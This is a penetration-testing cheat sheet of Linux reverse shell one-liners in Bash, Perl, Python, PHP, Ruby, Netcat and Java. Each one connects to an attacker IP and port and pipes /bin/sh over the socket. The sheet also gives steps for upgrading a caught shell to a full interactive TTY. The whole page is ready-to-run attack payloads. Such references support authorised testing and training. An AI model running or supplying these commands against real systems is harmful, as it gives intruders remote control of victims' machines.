Linux reverse shells

Bash
1
2
1
bash -i >& /dev/tcp/10.10.1.2/1234 0>&1
2
bash -c 'bash -i >& /dev/tcp/10.10.14.27/1234 0>&1'
Perl
perl -e 'use Socket;$i="10.10.1.2";$p=1234;
socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");
open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Python
python -c 'import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("10.10.1.2",1234));os.dup2(s.fileno(),0); 
os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);'
PHP
php -r '$sock=fsockopen("10.10.1.2",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
Ruby
ruby -rsocket -e'f=TCPSocket.open("10.10.1.2",1234).to_i;
exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
Netcat
1
2
1
nc -e /bin/sh 10.10.1.2 1234
2
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.1.2 1234 >/tmp/f
Java
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.1.2/1234;
cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
Shell upgrades
Python2
Python3
Magic Shell
Python2
# do which python once you already have a shell to verify it's installed
​
python -c 'import pty;pty.spawn("/bin/bash")';
Python3
# do which python3 once you already have a shell to verify it's installed
​
python3 -c 'import pty;pty.spawn("/bin/bash")';
Magic Shell
# Once you already have an upgraded shell (with python) you should be able to 
# upgrade it to a fully interactive one where you can tab and use your shortcuts 
​
# In the reverse shell:
Control + Z
​
# In the attacker's machine:
stty raw -echo
f g
enter enter
Linux Privilege escalation - Previous
Pentest JDWP
Port forwarding
Last updated 9 months ago